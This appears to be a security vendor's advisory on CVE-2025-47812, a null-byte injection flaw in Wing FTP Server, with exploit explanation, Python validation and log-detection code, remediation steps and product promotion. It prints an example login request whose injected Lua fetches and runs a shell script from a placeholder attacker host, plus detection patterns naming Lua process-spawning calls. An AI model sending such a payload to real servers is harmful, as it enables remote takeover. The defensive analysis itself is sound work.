CVE-2025-47812: Wing FTP Server Remote Code Execution Vulnerability (Null Byte Injection)
Published July 12, 2025 | CVSS Score: 10.0 (Critical)
CVE-2025-47812 is a critical vulnerability affecting Wing FTP Server versions prior to 7.4.4. This severe security flaw enables unauthenticated attackers to execute arbitrary code remotely (RCE) by exploiting inadequate validation of input containing null bytes (%00) in the authentication process.
When attackers inject a null byte into the username parameter, Wing FTP Server’s string handling functions prematurely terminate string processing, bypassing authentication controls while preserving malicious Lua code. This code is then executed with elevated privileges (root/SYSTEM), allowing full compromise. (Arctic Wolf, 2025; Help Net Security, 2025).
The exploit was publicly disclosed on June 30, 2025, and active exploitation was first detected on July 1, 2025 (The Hacker News, 2025).


Technical Attack Breakdown
A typical exploit request involves an HTTP POST containing the null-byte payload:
POST /loginok.html HTTP/1.1
Host: vulnerable-server.com
username=anon%00print(os.execute("curl -s http://attacker.com/shell.sh | bash"))
How the exploit works:
- The %00 null byte prematurely terminates the username string during authentication.
- The complete malicious input is stored verbatim into a session file.
- Wing FTP executes this session file as a Lua script, granting attackers root-level shell access.
Exploit flow, step by step:
1. The attacker sends an HTTP POST to the Wing FTP Server carrying the %00 payload.
2. Authentication check: username=anon%00print(os.execute("curl attacker.com/shell.sh | bash")) is processed as "anon"; everything after the null byte is ignored during the auth check but stored completely.
3. The server creates a session file, /Session/sess_[ID].lua, containing:
   -- Session data
   username="anon
   print(os.execute("curl attacker.com/shell.sh | bash"))"
4. The server executes the session file as a Lua script with SYSTEM/root privileges; the print(os.execute(...)) call retrieves and executes the malicious shell script.
5. The attacker gains control of the server.
6. A remote shell with root/SYSTEM privileges is returned to the attacker from the compromised server.
The core vulnerability emerges from a fundamental disparity in how different parts of Wing FTP Server process the same input string. For the user input anonymous%00malicious_lua_code:
- Authentication sees "anonymous" and the check returns PASS.
- Session storage stores "anonymous\0malicious_lua_code" in full, and that stored content is then executed.
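To make the disparity behind "How the exploit works" and the authentication-versus-storage split above concrete, here is an added Python model; it is not Wing FTP Server code and makes no claim about the product's internals. It models two consumers of the same username bytes, one that stops at the first NUL (as C-style strlen/strcmp do) and one that keeps the whole buffer (an explicit-length copy or a Lua string), then shows the input-boundary check that removes the disparity. The function names (parse_login_username, c_string_view, length_aware_view, has_disparity, validate_username), the allow-list policy and the sample form body are all constructed for this example.

```python
"""
Model of the NUL-byte string-handling disparity behind CVE-2025-47812.
Added example, not Wing FTP Server code: two consumers of the same username
bytes disagree when a NUL is present, and a strict boundary check prevents it.
All names, the allow-list and the sample input are constructed.
"""
from urllib.parse import unquote_to_bytes

# Strict allow-list for a login name; anything else is rejected before any
# consumer sees the value (constructed policy, not the product's).
ALLOWED_USERNAME_BYTES = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-@"
)
MAX_USERNAME_LEN = 64


def parse_login_username(form_body: bytes) -> bytes:
    """Pull the username field out of an x-www-form-urlencoded body.

    unquote_to_bytes turns %00 into a literal NUL byte, which is exactly the
    point at which a percent-encoded value becomes a NUL in memory.
    """
    for field in form_body.split(b"&"):
        key, _, value = field.partition(b"=")
        if key == b"username":
            return unquote_to_bytes(value)
    raise ValueError("no username field in form body")


def c_string_view(data: bytes) -> bytes:
    """What a NUL-terminated consumer (strlen, strcmp, ...) sees: the prefix before the first NUL."""
    nul = data.find(b"\x00")
    return data if nul < 0 else data[:nul]


def length_aware_view(data: bytes) -> bytes:
    """What a length-aware consumer (explicit-length file write, Lua string) sees: every byte."""
    return bytes(data)


def has_disparity(raw_username: bytes) -> bool:
    """True when the two consumers disagree about the username: the bug's precondition."""
    return c_string_view(raw_username) != length_aware_view(raw_username)


def validate_username(raw_username: bytes) -> str:
    """Hardened boundary check: reject NUL and any byte outside the allow-list up front."""
    if b"\x00" in raw_username:
        raise ValueError("username contains a NUL byte")
    if not 0 < len(raw_username) <= MAX_USERNAME_LEN:
        raise ValueError("username length out of range")
    if any(b not in ALLOWED_USERNAME_BYTES for b in raw_username):
        raise ValueError("username contains disallowed bytes")
    return raw_username.decode("ascii")


def username_is_accepted(raw_username: bytes) -> bool:
    """Boolean wrapper around validate_username for callers that only need accept/reject."""
    try:
        validate_username(raw_username)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample: the text after %00 is inert, not a payload.
    body = b"username=anon%00trailing-text&password=x"
    name = parse_login_username(body)
    print("auth check sees:  ", c_string_view(name))
    print("storage keeps:    ", length_aware_view(name))
    print("views disagree:   ", has_disparity(name))
    print("accepted by check:", username_is_accepted(name))
```

The design point is that the fix lives at the input boundary: once a value is rejected for containing a NUL (or anything outside a short allow-list), there is no longer a "truncated" and a "full" version of it for two subsystems to disagree about, which is the property the vendor's 7.4.4 fix has to restore.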
Affected Systems
- Wing FTP Server versions earlier than 7.4.4.
- Approximately 5,000 internet-facing Wing FTP Server instances are currently exposed to this vulnerability (The Hacker News, 2025).
Recommended Actions for Application Security Teams
Priority 1:
- Immediately upgrade Wing FTP servers to version 7.4.4 or newer.
- If immediate patching is not feasible, temporarily restrict access to /loginok.html using firewall or WAF rules.
Priority 2:
- Audit software inventories and Software Bill of Materials (SBOMs) to identify all deployments or embedded instances of Wing FTP.
- Examine server logs urgently for %00 patterns and suspicious session file creation under /Session/.
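The log and session-file review recommended above can be scripted. The following Python is an added example and is neither Kodem's nor Wing FTP Server's code; the access-log format, the session-file layout, the regex and function names (flag_login_requests, scan_session_text, scan_session_dir) and every sample line are constructed for illustration, so the patterns must be adapted to the real log format and session directory of the deployment under review.

```python
"""
Detection sketch for null-byte login requests and tampered session files.
Added example, not Kodem's or Wing FTP Server's code. The log format, the
session-file layout and all sample data are constructed for illustration.
"""
import re
from pathlib import Path
from typing import Iterator

# A NUL either percent-encoded in the request line or written raw into the log.
NULL_BYTE = re.compile(r"%00|\x00")
# Requests that hit the login handler named in the advisory.
LOGIN_REQUEST = re.compile(r'"(?:POST|GET) /loginok\.html')
# Lua calls that spawn a process or load more code; none belong in session data.
SUSPICIOUS_LUA = re.compile(r"\b(?:os\.execute|io\.popen|loadstring|dofile)\s*\(")
# A benign session line: blank, a Lua comment, or one key="value" assignment on a single line.
BENIGN_SESSION_LINE = re.compile(r'^\s*(?:--.*|[A-Za-z_]\w*\s*=\s*"[^"\\]*"\s*|)$')

# Constructed sample access log (combined-log style). Line 2 carries %00 in the
# query string and line 5 a raw NUL; line 4 carries a double-encoded %2500 that
# decodes to the text "%00", not to a NUL, and must not be flagged on its own.
SAMPLE_LOG = (
    '198.51.100.7 - - [01/Jul/2025:03:12:41 +0000] "POST /loginok.html HTTP/1.1" 200 512\n'
    '203.0.113.5 - - [01/Jul/2025:03:12:44 +0000] "POST /loginok.html?username=anon%00tail HTTP/1.1" 200 512\n'
    '203.0.113.5 - - [01/Jul/2025:03:12:45 +0000] "GET /dir.html HTTP/1.1" 200 2048\n'
    '192.0.2.9 - - [01/Jul/2025:03:13:02 +0000] "POST /loginok.html?username=anon%2500x HTTP/1.1" 200 512\n'
    '192.0.2.9 - - [01/Jul/2025:03:13:09 +0000] "POST /loginok.html?username=anon\x00tail HTTP/1.1" 200 512\n'
)

# Constructed session files following the "-- Session data" / key="value" layout
# described in the session-file step; the tampered one carries a NUL and a
# harmless process call standing in for an injected command.
BENIGN_SESSION = '-- Session data\nusername="anon"\nlogin_time="2025-07-01 03:12:41"\n'
TAMPERED_SESSION = '-- Session data\nusername="anon\x00"\nprint(os.execute("whoami"))\n'


def flag_login_requests(log_text: str) -> list[str]:
    """Return log lines that hit /loginok.html and carry a NUL, raw or percent-encoded."""
    return [
        line
        for line in log_text.splitlines()
        if LOGIN_REQUEST.search(line) and NULL_BYTE.search(line)
    ]


def scan_session_text(text: str) -> list[str]:
    """Return the reasons a session file looks tampered with; an empty list means it looks benign."""
    reasons: list[str] = []
    if "\x00" in text:
        reasons.append("contains NUL byte")
    if SUSPICIOUS_LUA.search(text):
        reasons.append("contains process-spawning Lua call")
    for number, line in enumerate(text.splitlines(), 1):
        if not BENIGN_SESSION_LINE.match(line):
            reasons.append(f'line {number} is not a simple key="value" assignment')
    return reasons


def scan_session_dir(session_dir: Path) -> Iterator[tuple[Path, list[str]]]:
    """Walk the session directory (e.g. /Session) and yield only the files that raise a flag."""
    for path in sorted(session_dir.glob("sess_*.lua")):
        reasons = scan_session_text(path.read_text(errors="replace"))
        if reasons:
            yield path, reasons


if __name__ == "__main__":
    for line in flag_login_requests(SAMPLE_LOG):
        print("suspicious login request:", line)
    for label, content in (("benign", BENIGN_SESSION), ("tampered", TAMPERED_SESSION)):
        print(f"{label} session file:", scan_session_text(content) or "no findings")
```

Two checks are deliberately separate: the request-log rule catches the attempt regardless of whether it succeeded, while the session-file rule catches what a successful attempt leaves on disk, which is also what a forensic snapshot of /Session should be run through. Matching the raw log line rather than a decoded copy keeps the double-encoded %2500 case from producing a false positive, and the per-line layout check flags anything that is not a single quoted assignment even when the injected call is one the SUSPICIOUS_LUA pattern does not list.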
Priority 3:
- Disable anonymous FTP accounts immediately.
- Rotate all FTP-related credentials.
- Limit administrative interface access to internal networks or VPN only.
Incident Response Guidelines for SOC/IR Teams
- Containment:
  - Isolate affected hosts immediately.
  - Create forensic snapshots of memory and disk, preserving session files under /Session.
- Investigation:
  - Inspect logs for outbound requests (curl, wget, PowerShell) and unauthorized file or user account creation or modification.
- Eradication and Recovery:
  - Rebuild affected servers from trusted images with Wing FTP version 7.4.4 or later.
  - Rotate credentials stored on compromised systems.
- Post-Incident Recommendations:
  - Implement monitoring rules targeting Lua script execution and HTTP requests containing %00.
  - Conduct a post-mortem and update security training regarding vulnerabilities related to null byte injections.
How Kodem Protects Customers
- Kodem SCA customers were instantly able to identify (a) where the vulnerable Wing FTP package was installed, (b) where it was actively running in production, and (c) which instances were reachable and exploitable by attackers. Kodem promptly detected exploit activity, mitigated the immediate threat until patches were deployed, and continued monitoring for future exploitation attempts.
- Kodem’s runtime detection capability, leveraging eBPF and memory analysis, immediately identified attacker-triggered Lua executions within Wing FTP Server processes, without requiring an agent on the vulnerable server.
- Kodem automatically constructed an attack-chain visualization correlating malicious HTTP requests, Lua executions, and resulting command shells. Initial exploitation attempts were detected by Kodem customers on July 1st, 2025, preceding widespread public advisories.
Key Lessons for Security Teams
- Static analysis and SBOMs list installed components but do not reflect runtime vulnerabilities and attacks.
- The time between vulnerability disclosure and active exploitation has shortened significantly, often to mere hours, emphasizing the importance of rapid incident response.
- Runtime monitoring provides essential context, converting vulnerability data into actionable intelligence. Static vulnerability listings alone are insufficient.
In short: “Static findings suggest vulnerabilities. Runtime reveals exploitation.”
References
Arctic Wolf. (2025, July 10). CVE-2025-47812: Wing FTP Server remote code execution vulnerability exploited in the wild. Retrieved from https://arcticwolf.com/resources/blog-uk/cve-2025-47812-wing-ftp-server-remote-code-execution-vulnerability-exploited-in-the-wild/
Help Net Security. (2025, July 11). Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812). Retrieved from https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/
The Hacker News. (2025, July 11). Critical Wing FTP Server vulnerability actively being exploited. Retrieved from https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html